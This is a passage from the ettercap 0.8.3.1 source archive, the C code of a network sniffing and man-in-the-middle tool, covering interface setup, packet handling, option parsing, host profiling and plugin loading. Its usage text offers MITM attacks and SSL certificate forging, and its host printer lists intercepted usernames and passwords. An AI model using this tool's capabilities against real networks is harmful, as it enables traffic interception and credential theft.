ip_addr_init(&ip6->ip, AF_INET6, (u_char*)&sa6->sin6_addr); sa6 = (struct sockaddr_in6*)ifaddr->ifa_netmask; ip_addr_init(&ip6->netmask, AF_INET6, (u_char*)&sa6->sin6_addr); ip_addr_get_network(&ip6->ip, &ip6->netmask, &ip6->network); ip6->prefix = ip_addr_get_prefix(&ip6->netmask); LIST_INSERT_HEAD(&source->ip6_list, ip6, next); source->has_ipv6 = 1; } } freeifaddrs(ifaddrs); #endif /* OS_WINDOWS */ source->is_ready = 1; return E_SUCCESS; } static void source_close(struct iface_env *iface) { #ifdef WITH_IPV6 struct net_list *n; #endif iface->is_ready = 0; if(iface->pcap != NULL) pcap_close(iface->pcap); if(iface->lnet != NULL) libnet_destroy(iface->lnet); #ifdef WITH_IPV6 LIST_FOREACH(n, &iface->ip6_list, next) { LIST_REMOVE(n, next); SAFE_FREE(n); } #endif SAFE_FREE(iface->name); memset(iface, 0, sizeof(*iface)); } static int secondary_sources_init(char **sources) { struct source_entry *se; int n = 0; SOURCES_LIST_LOCK; for(n = 0; sources[n] != NULL; n++) { SAFE_CALLOC(se, 1, sizeof(*se)); /* secondary interfaces are always live */ source_init(sources[n], &se->iface, true, false); if(se->iface.is_ready) LIST_INSERT_HEAD(&sources_list, se, next); else SAFE_FREE(se); } SOURCES_LIST_UNLOCK; return n; } void secondary_sources_foreach(void (*callback)(struct iface_env*)) { struct source_entry *se; SOURCES_LIST_LOCK; LIST_FOREACH(se, &sources_list, next) { callback(&se->iface); } SOURCES_LIST_UNLOCK; } static void close_secondary_sources(void) { struct source_entry *se; SOURCES_LIST_LOCK; LIST_FOREACH(se, &sources_list, next) { LIST_REMOVE(se, next); source_close(&se->iface); SAFE_FREE(se); } SOURCES_LIST_UNLOCK; } static void l3_init(void) { libnet_t *l4; #ifdef WITH_IPV6 libnet_t *l6; #endif #ifdef OS_WINDOWS char *name = EC_GBL_OPTIONS->iface; #else char *name = NULL; #endif char lnet_errbuf[LIBNET_ERRBUF_SIZE]; DEBUG_MSG("l3_init"); /* open the socket at layer 3 */ l4 = libnet_init(LIBNET_RAW4_ADV, name, lnet_errbuf); if (l4 == NULL) { DEBUG_MSG("send_init: libnet_init(LIBNET_RAW4_ADV) failed: %s", lnet_errbuf); USER_MSG("Libnet failed IPv4 initialization. Don't send IPv4 packets.\n"); } EC_GBL_LNET->lnet_IP4 = l4; #ifdef WITH_IPV6 /* open the socket at layer 3 for IPv6 */ l6 = libnet_init(LIBNET_RAW6_ADV, name, lnet_errbuf); if(l6 == NULL) { DEBUG_MSG("%s: libnet_init(LIBNET_RAW6_ADV) failed: %s", __func__, lnet_errbuf); USER_MSG("Libnet failed IPv6 initialization. Don't send IPv6 packets.\n"); } EC_GBL_LNET->lnet_IP6 = l6; #endif atexit(l3_close); } static void l3_close(void) { if(EC_GBL_LNET->lnet_IP4) libnet_destroy(EC_GBL_LNET->lnet_IP4); #ifdef WITH_IPV6 if(EC_GBL_LNET->lnet_IP6) libnet_destroy(EC_GBL_LNET->lnet_IP6); #endif DEBUG_MSG("ATEXIT: send_closed"); } struct iface_env* iface_by_mac(u_int8 mac[MEDIA_ADDR_LEN]) { struct source_entry *se; SOURCES_LIST_LOCK; LIST_FOREACH(se, &sources_list, next) { if(!memcmp(se->iface.mac, mac, MEDIA_ADDR_LEN)) { SOURCES_LIST_UNLOCK; return &se->iface; } } SOURCES_LIST_UNLOCK; return NULL; } ettercap-0.8.3.1/src/ec_packet.c000664 000000 000000 00000013073 13711276346 016337 0ustar00rootroot000000 000000 /* ettercap -- packet object handling Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* --------------------------- */ struct packet_object* packet_allocate_object(u_char *data, u_int len) { struct packet_object *po; SAFE_CALLOC(po, 1, sizeof(struct packet_object)); packet_create_object(po, data, len); po->flags |= PO_FORGED; return po; } /* * associate the buffer to the packet object */ int packet_create_object(struct packet_object *po, u_char *buf, u_int len) { /* clear the memory */ memset(po, 0, sizeof(struct packet_object)); /* set the buffer and the len of the received packet */ po->packet = buf; po->len = len; return (0); } /* * allocate the buffer for disp data * * disp data is useful when the protocol is * encrypted and we want to forward the packet as is * but display the decrypted data. * decoders should decrypt data from po->DATA.data to po->DATA.disp_data */ int packet_disp_data(struct packet_object *po, u_char *buf, u_int len) { /* disp_data is always null terminated */ if (len + 1) { if(po->DATA.disp_data) SAFE_FREE(po->DATA.disp_data); SAFE_CALLOC(po->DATA.disp_data, len + 1, sizeof(u_char)); } else { ERROR_MSG("packet_disp_data() negative len"); } po->DATA.disp_len = len; memcpy(po->DATA.disp_data, buf, len); return len; } /* * free the packet object memory */ int packet_destroy_object(struct packet_object *po) { /* * the packet is a duplicate * we have to free even the packet buffer. * alse free data directed to top_half */ if (po->flags & PO_DUP) { SAFE_FREE(po->packet); /* * free the dissector info * during the duplication, the pointers where * passed to the dup, so we have to free them * here. */ SAFE_FREE(po->DISSECTOR.user); SAFE_FREE(po->DISSECTOR.pass); SAFE_FREE(po->DISSECTOR.content); SAFE_FREE(po->DISSECTOR.info); SAFE_FREE(po->DISSECTOR.banner); SAFE_FREE(po->DISSECTOR.os); } /* * free the disp_data pointer * it was malloced by tcp or udp decoder. * If the packet was duplicated, disp_data points to NULL * (the dup func set it) * because the duplicate points to the real data and will * free them. */ SAFE_FREE(po->DATA.disp_data); /* if it is alloced entirely by ourselves */ if(po->flags & PO_FORGED) { SAFE_FREE(po->packet); SAFE_FREE(po); } return 0; } /* * duplicate a po and return * the new allocated one */ struct packet_object * packet_dup(struct packet_object *po, u_char flag) { struct packet_object *dup_po; SAFE_CALLOC(dup_po, 1, sizeof(struct packet_object)); /* * copy the po over the dup_po * but this is not sufficient, we have to adjust all * the pointer to the po->packet. * so allocate a new packet, then recalculate the * pointers */ memcpy(dup_po, po, sizeof(struct packet_object)); /* * We set disp_data to NULL to avoid free in the * original packet. Descending decoder chain doesn't * care about disp_data. top_half will free it when * necessary, destroying the packet duplicate. */ dup_po->DATA.disp_data = po->DATA.disp_data; po->DATA.disp_data = NULL; po->DATA.disp_len = 0; /* copy only if the buffer exists */ if ( (flag & PO_DUP_PACKET) && po->packet != NULL) { /* duplicate the po buffer */ SAFE_CALLOC(dup_po->packet, po->len, sizeof(u_char)); /* copy the buffer */ memcpy(dup_po->packet, po->packet, po->len); } else { dup_po->len = 0; dup_po->packet = NULL; } /* * If we want to duplicate packet content we don't want * user, pass, etc. Otherwise we would free them twice * (they are freed by the other duplicate into top half). */ if (flag & PO_DUP_PACKET) { dup_po->DISSECTOR.user = NULL; dup_po->DISSECTOR.pass = NULL; dup_po->DISSECTOR.info = NULL; dup_po->DISSECTOR.banner = NULL; dup_po->DISSECTOR.os = NULL; } /* * adjust all the pointers as the difference * between the old buffer and the pointer */ dup_po->L2.header = dup_po->packet + (po->L2.header - po->packet); dup_po->L3.header = dup_po->packet + (po->L3.header - po->packet); dup_po->L3.options = dup_po->packet + (po->L3.options - po->packet); dup_po->L4.header = dup_po->packet + (po->L4.header - po->packet); dup_po->L4.options = dup_po->packet + (po->L4.options - po->packet); dup_po->DATA.data = dup_po->packet + (po->DATA.data - po->packet); dup_po->fwd_packet = dup_po->packet + (po->fwd_packet - po->packet); /* this packet is a duplicate */ dup_po->flags |= PO_DUP; return dup_po; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_parser.c000664 000000 000000 00000041334 13711276346 016365 0ustar00rootroot000000 000000 /* ettercap -- parsing utilities Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef HAVE_EC_LUA #include #endif #include #ifdef HAVE_GETOPT_H #include #else #include #endif /* protos... */ static void ec_usage(void); /*****************************************/ void ec_usage(void) { fprintf(stdout, "\nUsage: %s [OPTIONS] [TARGET1] [TARGET2]\n", EC_GBL_PROGRAM); #ifdef WITH_IPV6 fprintf(stdout, "\nTARGET is in the format MAC/IP/IPv6/PORTs (see the man for further detail)\n"); #else fprintf(stdout, "\nTARGET is in the format MAC/IP/PORTs (see the man for further detail)\n"); #endif fprintf(stdout, "\nSniffing and Attack options:\n"); fprintf(stdout, " -M, --mitm perform a mitm attack\n"); fprintf(stdout, " -o, --only-mitm don't sniff, only perform the mitm attack\n"); fprintf(stdout, " -b, --broadcast sniff packets destined to broadcast\n"); fprintf(stdout, " -B, --bridge use bridged sniff (needs 2 ifaces)\n"); fprintf(stdout, " -p, --nopromisc do not put the iface in promisc mode\n"); fprintf(stdout, " -S, --nosslmitm do not forge SSL certificates\n"); fprintf(stdout, " -u, --unoffensive do not forward packets\n"); fprintf(stdout, " -r, --read read data from pcapfile \n"); fprintf(stdout, " -f, --pcapfilter set the pcap filter \n"); fprintf(stdout, " -R, --reversed use reversed TARGET matching\n"); fprintf(stdout, " -t, --proto sniff only this proto (default is all)\n"); fprintf(stdout, " --certificate certificate file to use for SSL MiTM\n"); fprintf(stdout, " --private-key private key file to use for SSL MiTM\n"); fprintf(stdout, "\nUser Interface Type:\n"); fprintf(stdout, " -T, --text use text only GUI\n"); fprintf(stdout, " -q, --quiet do not display packet contents\n"); fprintf(stdout, " -s, --script issue these commands to the GUI\n"); fprintf(stdout, " -C, --curses use curses GUI\n"); fprintf(stdout, " -D, --daemon daemonize ettercap (no GUI)\n"); fprintf(stdout, " -G, --gtk use GTK+ GUI\n"); fprintf(stdout, "\nLogging options:\n"); fprintf(stdout, " -w, --write write sniffed data to pcapfile \n"); fprintf(stdout, " -L, --log log all the traffic to this \n"); fprintf(stdout, " -l, --log-info log only passive infos to this \n"); fprintf(stdout, " -m, --log-msg log all the messages to this \n"); fprintf(stdout, " -c, --compress use gzip compression on log files\n"); fprintf(stdout, "\nVisualization options:\n"); fprintf(stdout, " -d, --dns resolves ip addresses into hostnames\n"); fprintf(stdout, " -V, --visual set the visualization format\n"); fprintf(stdout, " -e, --regex visualize only packets matching this regex\n"); fprintf(stdout, " -E, --ext-headers print extended header for every pck\n"); fprintf(stdout, " -Q, --superquiet do not display user and password\n"); #ifdef HAVE_EC_LUA fprintf(stdout, "\nLUA options:\n"); fprintf(stdout, " --lua-script ,[,...] comma-separted list of LUA scripts\n"); fprintf(stdout, " --lua-args n1=v1,[n2=v2,...] comma-separated arguments to LUA script(s)\n"); #endif fprintf(stdout, "\nGeneral options:\n"); fprintf(stdout, " -i, --iface use this network interface\n"); fprintf(stdout, " -I, --liface show all the network interfaces\n"); fprintf(stdout, " -Y, --secondary list of secondary network interfaces\n"); fprintf(stdout, " -n, --netmask force this on iface\n"); fprintf(stdout, " -A, --address
force this local
on iface\n"); fprintf(stdout, " -P, --plugin launch this - multiple occurance allowed\n"); fprintf(stdout, " --plugin-list ,[,...] comma-separated list of plugins\n"); fprintf(stdout, " -F, --filter load the filter (content filter)\n"); fprintf(stdout, " -z, --silent do not perform the initial ARP scan\n"); #ifdef WITH_IPV6 fprintf(stdout, " -6, --ip6scan send ICMPv6 probes to discover IPv6 nodes on the link\n"); #endif fprintf(stdout, " -j, --load-hosts load the hosts list from \n"); fprintf(stdout, " -k, --save-hosts save the hosts list to \n"); fprintf(stdout, " -W, --wifi-key use this key to decrypt wifi packets (wep or wpa)\n"); fprintf(stdout, " -a, --config use the alternative config file \n"); fprintf(stdout, "\nStandard options:\n"); fprintf(stdout, " -v, --version prints the version and exit\n"); fprintf(stdout, " -h, --help this help screen\n"); fprintf(stdout, "\n\n"); //clean_exit(0); exit(0); } void parse_options(int argc, char **argv) { int c; static struct option long_options[] = { { "help", no_argument, NULL, 'h' }, { "version", no_argument, NULL, 'v' }, { "iface", required_argument, NULL, 'i' }, { "lifaces", no_argument, NULL, 'I' }, { "netmask", required_argument, NULL, 'n' }, { "address", required_argument, NULL, 'A' }, { "write", required_argument, NULL, 'w' }, { "read", required_argument, NULL, 'r' }, { "pcapfilter", required_argument, NULL, 'f' }, { "reversed", no_argument, NULL, 'R' }, { "proto", required_argument, NULL, 't' }, { "plugin", required_argument, NULL, 'P' }, { "plugin-list", required_argument, NULL, 0 }, { "filter", required_argument, NULL, 'F' }, #ifdef HAVE_EC_LUA { "lua-script", required_argument, NULL, 0 }, { "lua-args", required_argument, NULL, 0 }, #endif { "superquiet", no_argument, NULL, 'Q' }, { "quiet", no_argument, NULL, 'q' }, { "script", required_argument, NULL, 's' }, { "silent", no_argument, NULL, 'z' }, #ifdef WITH_IPV6 { "ip6scan", no_argument, NULL, '6' }, #endif { "unoffensive", no_argument, NULL, 'u' }, { "nosslmitm", no_argument, NULL, 'S' }, { "load-hosts", required_argument, NULL, 'j' }, { "save-hosts", required_argument, NULL, 'k' }, { "wifi-key", required_argument, NULL, 'W' }, { "config", required_argument, NULL, 'a' }, { "dns", no_argument, NULL, 'd' }, { "regex", required_argument, NULL, 'e' }, { "visual", required_argument, NULL, 'V' }, { "ext-headers", no_argument, NULL, 'E' }, { "log", required_argument, NULL, 'L' }, { "log-info", required_argument, NULL, 'l' }, { "log-msg", required_argument, NULL, 'm' }, { "compress", no_argument, NULL, 'c' }, { "text", no_argument, NULL, 'T' }, { "curses", no_argument, NULL, 'C' }, { "daemon", no_argument, NULL, 'D' }, { "gtk", no_argument, NULL, 'G' }, { "mitm", required_argument, NULL, 'M' }, { "only-mitm", no_argument, NULL, 'o' }, { "bridge", required_argument, NULL, 'B' }, { "broadcast", required_argument, NULL, 'b' }, { "nopromisc", no_argument, NULL, 'p' }, { "gateway", required_argument, NULL, 'Y' }, { "certificate", required_argument, NULL, 0 }, { "private-key", required_argument, NULL, 0 }, { 0 , 0 , 0 , 0} }; for (c = 0; c < argc; c++) DEBUG_MSG("parse_options -- [%d] [%s]", c, argv[c]); /* OPTIONS INITIALIZATION */ EC_GBL_PCAP->promisc = 1; EC_GBL_FORMAT = &ascii_format; EC_GBL_OPTIONS->ssl_mitm = 1; EC_GBL_OPTIONS->broadcast = 0; EC_GBL_OPTIONS->ssl_cert = NULL; EC_GBL_OPTIONS->ssl_pkey = NULL; /* OPTIONS INITIALIZED */ optind = 0; int option_index = 0; while ((c = getopt_long (argc, argv, "A:a:bB:CchDdEe:F:f:GhIi:j:k:L:l:M:m:n:oP:pQqiRr:s:STt:uV:vW:w:Y:z6", long_options, &option_index)) != EOF) { /* used for parsing arguments */ char *opt_end = optarg; while (opt_end && *opt_end) opt_end++; /* enable a loaded filter script? */ switch (c) { case 'M': set_mitm(optarg); break; case 'o': set_onlymitm(); //select_text_interface(); break; case 'b': set_broadcast(); break; case 'B': set_iface_bridge(optarg); break; case 'p': set_promisc(); break; #ifndef JUST_LIBRARY case 'T': select_text_interface(); break; case 'C': select_curses_interface(); break; case 'G': select_gtk_interface(); break; case 'D': select_daemon_interface(); break; #endif case 'R': set_reversed(); break; case 't': set_proto(optarg); break; case 'P': set_plugin(optarg); break; case 'i': set_iface(optarg); break; case 'I': /* this option is only useful in the text interface */ set_lifaces(); select_text_interface(); break; case 'Y': set_secondary(optarg); break; case 'n': set_netmask(optarg); break; case 'A': set_address(optarg); break; case 'r': set_read_pcap(optarg); break; case 'w': set_write_pcap(optarg); break; case 'f': set_pcap_filter(optarg); break; case 'F': set_filter(opt_end, optarg); break; case 'L': set_loglevel_packet(optarg); break; case 'l': set_loglevel_info(optarg); break; case 'm': set_loglevel_true(optarg); break; case 'c': set_compress(); break; case 'e': opt_set_regex(optarg); break; case 'Q': set_superquiet(); /* no break, quiet must be enabled */ /* fall through */ case 'q': set_quiet(); break; case 's': set_script(optarg); break; case 'z': set_silent(); break; #ifdef WITH_IPV6 case '6': set_ip6scan(); break; #endif case 'u': set_unoffensive(); break; case 'S': disable_sslmitm(); break; case 'd': set_resolve(); break; case 'j': set_load_hosts(optarg); break; case 'k': set_save_hosts(optarg); break; case 'V': opt_set_format(optarg); break; case 'E': set_ext_headers(); break; case 'W': set_wifi_key(optarg); break; case 'a': set_conf_file(optarg); break; case 'h': ec_usage(); break; case 'v': printf("%s %s\n", EC_GBL_PROGRAM, EC_GBL_VERSION); clean_exit(0); break; /* Certificate and private key options */ case 0: if (!strcmp(long_options[option_index].name, "certificate")) { EC_GBL_OPTIONS->ssl_cert = strdup(optarg); } else if (!strcmp(long_options[option_index].name, "private-key")) { EC_GBL_OPTIONS->ssl_pkey = strdup(optarg); #ifdef HAVE_EC_LUA } else if (!strcmp(long_options[option_index].name,"lua-args")) { ec_lua_cli_add_args(strdup(optarg)); } else if (!strcmp(long_options[option_index].name,"lua-script")) { ec_lua_cli_add_script(strdup(optarg)); break; #endif } else if (!strcmp(long_options[option_index].name, "plugin-list")) { set_plugin_list(strdup(optarg)); } else { fprintf(stdout, "\nTry `%s --help' for more options.\n\n", EC_GBL_PROGRAM); clean_exit(-1); } break; case ':': // missing parameter fprintf(stdout, "\nTry `%s --help' for more options.\n\n", EC_GBL_PROGRAM); clean_exit(-1); break; case '?': // unknown option fprintf(stdout, "\nTry `%s --help' for more options.\n\n", EC_GBL_PROGRAM); clean_exit(-1); break; } } DEBUG_MSG("parse_options: options parsed"); /* TARGET1 and TARGET2 parsing */ if (argv[optind]) { EC_GBL_OPTIONS->target1 = strdup(argv[optind]); DEBUG_MSG("TARGET1: %s", EC_GBL_OPTIONS->target1); if (argv[optind+1]) { EC_GBL_OPTIONS->target2 = strdup(argv[optind+1]); DEBUG_MSG("TARGET2: %s", EC_GBL_OPTIONS->target2); } } /* create the list form the TARGET format (MAC/IPrange/PORTrange) */ compile_display_filter(); DEBUG_MSG("parse_options: targets parsed"); /* check for other options */ if (EC_GBL_SNIFF->start == NULL) set_unified_sniff(); if (EC_GBL_OPTIONS->read && EC_GBL_PCAP->filter) FATAL_ERROR("Cannot read from file and set a filter on interface"); if (EC_GBL_OPTIONS->read && EC_GBL_SNIFF->type != SM_UNIFIED ) FATAL_ERROR("You can read from a file ONLY in unified sniffing mode !"); if (EC_GBL_OPTIONS->mitm && EC_GBL_SNIFF->type != SM_UNIFIED ) FATAL_ERROR("You can't do mitm attacks in bridged sniffing mode !"); if (EC_GBL_SNIFF->type == SM_BRIDGED && EC_GBL_PCAP->promisc == 0) FATAL_ERROR("During bridged sniffing the iface must be in promisc mode !"); if (EC_GBL_OPTIONS->quiet && EC_GBL_UI->type != UI_TEXT) FATAL_ERROR("The quiet option is useful only with text only UI"); if (EC_GBL_OPTIONS->load_hosts && EC_GBL_OPTIONS->save_hosts) FATAL_ERROR("Cannot load and save at the same time the hosts list..."); if (EC_GBL_OPTIONS->unoffensive && EC_GBL_OPTIONS->mitm) FATAL_ERROR("Cannot use mitm attacks in unoffensive mode"); if (EC_GBL_OPTIONS->read && EC_GBL_OPTIONS->mitm) FATAL_ERROR("Cannot use mitm attacks while reading from file"); #ifndef JUST_LIBRARY if (EC_GBL_UI->init == NULL) FATAL_ERROR("Please select an User Interface"); #endif /* force text interface for only mitm attack */ /* Do not select text interface for only MiTM mode if (EC_GBL_OPTIONS->only_mitm) { if (EC_GBL_OPTIONS->mitm) select_text_interface(); else FATAL_ERROR("Only mitm requires at least one mitm method"); } */ DEBUG_MSG("parse_options: options combination looks good"); return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_passive.c000664 000000 000000 00000017336 13711276346 016550 0ustar00rootroot000000 000000 /* ettercap -- passive information handling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include /************************************************/ /* * the strategy for open port discovery is: * * if the port is less than 1024, it is open at high probability * * if it is a TCP packet, we can rely on the tcp flags. * so syn+ack packet are coming from an open port. * * as a last resource, look in the registered dissector table. * if a port is registered, it might be opened. * */ int is_open_port(u_int8 proto, u_int16 port, u_int8 flags) { switch (proto) { case NL_TYPE_TCP: #if 0 /* detect priviledged port */ if (ntohs(po->L4.src) > 0 && ntohs(po->L4.src) < 1024 ) return 1; #endif /* SYN+ACK packet are coming from open ports */ if ( (flags & TH_SYN) && (flags & TH_ACK) ) return 1; break; case NL_TYPE_UDP: /* * we cannot determine if the port is open or not... * suppose that all priveledged port used are open. */ if (ntohs(port) > 0 && ntohs(port) < 1024 ) return 1; /* look up in the table */ if ( get_decoder(APP_LAYER_UDP, ntohs(port)) != NULL) return 1; break; } return 0; } /* * prints the infos of a single host */ void print_host(struct host_profile *h) { struct open_port *o; struct active_user *u; char tmp[MAX_ASCII_ADDR_LEN]; char os[OS_LEN+1]; memset(os, 0, sizeof(os)); fprintf(stdout, "==================================================\n"); fprintf(stdout, " IP address : %s \n", ip_addr_ntoa(&h->L3_addr, tmp)); if (strcmp(h->hostname, "")) fprintf(stdout, " Hostname : %s \n", h->hostname); #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) fprintf(stdout, " Location : %s \n", geoip_country_by_ip(&h->L3_addr)); #endif fprintf(stdout, "\n"); if (h->type & FP_HOST_LOCAL || h->type == FP_UNKNOWN) { fprintf(stdout, " MAC address : %s \n", mac_addr_ntoa(h->L2_addr, tmp)); fprintf(stdout, " MANUFACTURER : %s \n\n", manuf_search((const char*)h->L2_addr)); } fprintf(stdout, " DISTANCE : %d \n", h->distance); if (h->type & FP_GATEWAY) fprintf(stdout, " TYPE : GATEWAY\n\n"); else if (h->type & FP_HOST_LOCAL) fprintf(stdout, " TYPE : LAN host\n\n"); else if (h->type & FP_ROUTER) fprintf(stdout, " TYPE : REMOTE ROUTER\n\n"); else if (h->type & FP_HOST_NONLOCAL) fprintf(stdout, " TYPE : REMOTE host\n\n"); else if (h->type == FP_UNKNOWN) fprintf(stdout, " TYPE : unknown\n\n"); fprintf(stdout, " FINGERPRINT : %s\n", h->fingerprint); if (fingerprint_search((const char*)h->fingerprint, os) == E_SUCCESS) fprintf(stdout, " OPERATING SYSTEM : %s \n\n", os); else { fprintf(stdout, " OPERATING SYSTEM : unknown fingerprint (please submit it) \n"); fprintf(stdout, " NEAREST ONE IS : %s \n\n", os); } LIST_FOREACH(o, &(h->open_ports_head), next) { fprintf(stdout, " PORT : %s %d | %s \t[%s]\n", (o->L4_proto == NL_TYPE_TCP) ? "TCP" : "UDP" , ntohs(o->L4_addr), service_search(o->L4_addr, o->L4_proto), (o->banner) ? o->banner : ""); LIST_FOREACH(u, &(o->users_list_head), next) { if (u->failed) fprintf(stdout, " ACCOUNT : * %s / %s (%s)\n", u->user, u->pass, ip_addr_ntoa(&u->client, tmp)); else fprintf(stdout, " ACCOUNT : %s / %s (%s)\n", u->user, u->pass, ip_addr_ntoa(&u->client, tmp)); if (u->info) fprintf(stdout, " INFO : %s\n\n", u->info); else fprintf(stdout, "\n"); } fprintf(stdout, "\n"); } fprintf(stdout, "\n==================================================\n\n"); } /* * prints the infos of a single host in XML format */ void print_host_xml(struct host_profile *h) { struct open_port *o; struct active_user *u; char tmp[MAX_ASCII_ADDR_LEN]; char os[OS_LEN+1]; memset(os, 0, sizeof(os)); fprintf(stdout, "\t\n", ip_addr_ntoa(&h->L3_addr, tmp)); if (strcmp(h->hostname, "")) fprintf(stdout, "\t\t%s\n", h->hostname); #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) fprintf(stdout, "\t\t%s\n", geoip_country_by_ip(&h->L3_addr)); #endif if (h->type & FP_HOST_LOCAL || h->type == FP_UNKNOWN) { fprintf(stdout, "\t\t%s\n", mac_addr_ntoa(h->L2_addr, tmp)); fprintf(stdout, "\t\t%s\n", manuf_search((const char*)h->L2_addr)); } fprintf(stdout, "\t\t%d\n", h->distance); if (h->type & FP_GATEWAY) fprintf(stdout, "\t\tGATEWAY\n"); else if (h->type & FP_HOST_LOCAL) fprintf(stdout, "\t\tLAN host\n"); else if (h->type & FP_ROUTER) fprintf(stdout, "\t\tREMOTE ROUTER\n"); else if (h->type & FP_HOST_NONLOCAL) fprintf(stdout, "\t\tREMOTE host\n"); else if (h->type == FP_UNKNOWN) fprintf(stdout, "\t\tunknown\n"); if (strcmp((const char*)h->fingerprint, "")) { if (fingerprint_search((const char*)h->fingerprint, os) == E_SUCCESS) { fprintf(stdout, "\t\t%s\n", h->fingerprint); fprintf(stdout, "\t\t%s\n", os); } else { fprintf(stdout, "\t\t%s\n", h->fingerprint); fprintf(stdout, "\t\t%s\n", os); } } LIST_FOREACH(o, &(h->open_ports_head), next) { fprintf(stdout, "\t\t\n", (o->L4_proto == NL_TYPE_TCP) ? "tcp" : "udp", ntohs(o->L4_addr), service_search(o->L4_addr, o->L4_proto)); if (o->banner) fprintf(stdout, "\t\t\t%s\n", o->banner); LIST_FOREACH(u, &(o->users_list_head), next) { if (u->failed) fprintf(stdout, "\t\t\t\n", u->user); else fprintf(stdout, "\t\t\t\n", u->user); fprintf(stdout, "\t\t\t\t%s\n", u->user); fprintf(stdout, "\t\t\t\t%s\n", u->pass); fprintf(stdout, "\t\t\t\t%s\n", ip_addr_ntoa(&u->client, tmp)); if (u->info) fprintf(stdout, "\t\t\t\t%s\n", u->info); fprintf(stdout, "\t\t\t\n"); } fprintf(stdout, "\t\t\n"); } fprintf(stdout, "\t\n"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_plugins.c000664 000000 000000 00000026165 13711276346 016557 0ustar00rootroot000000 000000 /* ettercap -- plugin handling Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #ifndef HAVE_SCANDIR #include #endif #ifdef HAVE_PLUGINS #ifdef HAVE_LTDL_H #include #endif #ifdef HAVE_DLFCN_H #include #endif #endif /* symbol prefix for some OSes */ #ifdef NEED_USCORE #define SYM_PREFIX "_" #else #define SYM_PREFIX "" #endif /* global data */ struct plugin_entry { void *handle; char activated; /* if the init fuction was already called */ struct plugin_ops *ops; SLIST_ENTRY(plugin_entry) next; }; static SLIST_HEAD(, plugin_entry) plugin_head; /* mutexes */ static pthread_mutex_t kill_mutex = PTHREAD_MUTEX_INITIALIZER; #define KILL_LOCK do { pthread_mutex_lock(&kill_mutex); } while (0) #define KILL_UNLOCK do { pthread_mutex_unlock(&kill_mutex); } while (0) static pthread_mutex_t plugin_list_mutex = PTHREAD_MUTEX_INITIALIZER; #define PLUGIN_LIST_LOCK do { pthread_mutex_lock(&plugin_list_mutex); } \ while (0) #define PLUGIN_LIST_UNLOCK do { pthread_mutex_unlock(&plugin_list_mutex); } \ while (0) /* protos... */ void plugin_unload_all(void); static void plugin_print(char active, struct plugin_ops *ops); int plugin_filter(const struct dirent *d); /*******************************************/ /* * load a plugin given the full path */ int plugin_load_single(const char *path, char *name) { #ifdef HAVE_PLUGINS char file[strlen(path)+strlen(name)+2]; void *handle; int (*plugin_load)(void *); snprintf(file, sizeof(file), "%s/%s", path, name); DEBUG_MSG("plugin_load_single: %s", file); /* load the plugin */ handle = dlopen(file, RTLD_NOW|RTLD_LOCAL); if (handle == NULL) { DEBUG_MSG("plugin_load_single - %s - dlopen() | %s", file, dlerror()); return -E_INVALID; } /* find the loading function */ plugin_load = dlsym(handle, SYM_PREFIX "plugin_load"); if (plugin_load == NULL) { DEBUG_MSG("plugin_load_single - %s - lt_dlsym() | %s", file, dlerror()); dlclose(handle); return -E_INVALID; } /* * return the same value of plugin_register * we pass the handle to the plugin, which * in turn passes it to the plugin_register * function */ return plugin_load(handle); #else (void) path; (void) name; return -E_INVALID; #endif } /* * filter for the scandir function */ int plugin_filter(const struct dirent *d) { if ( match_pattern(d->d_name, PLUGIN_PATTERN) ) return 1; return 0; } /* * search and load all plugins in INSTALL_PREFIX/lib */ void plugin_load_all(void) { #ifdef HAVE_PLUGINS struct dirent **namelist = NULL; int n, i, ret; int t = 0; char *where; DEBUG_MSG("plugin_loadall"); #ifdef OS_WINDOWS /* Assume .DLLs are under "/lib". This should be unified for * all; ec_get_lib_path()? */ char path[PATH_MAX]; snprintf(path, sizeof(path), "%s%s", ec_win_get_ec_dir(), INSTALL_LIBDIR); where = path; #else /* default path */ where = INSTALL_LIBDIR "/" PROGRAM; #endif /* first search in INSTALL_LIBDIR/ettercap" */ n = scandir(where, &namelist, plugin_filter, alphasort); /* on error fall back to the current dir */ if (n <= 0) { DEBUG_MSG("plugin_loadall: no plugin in %s searching locally...", where); /* change the path to the local one */ where = "plug-ins"; 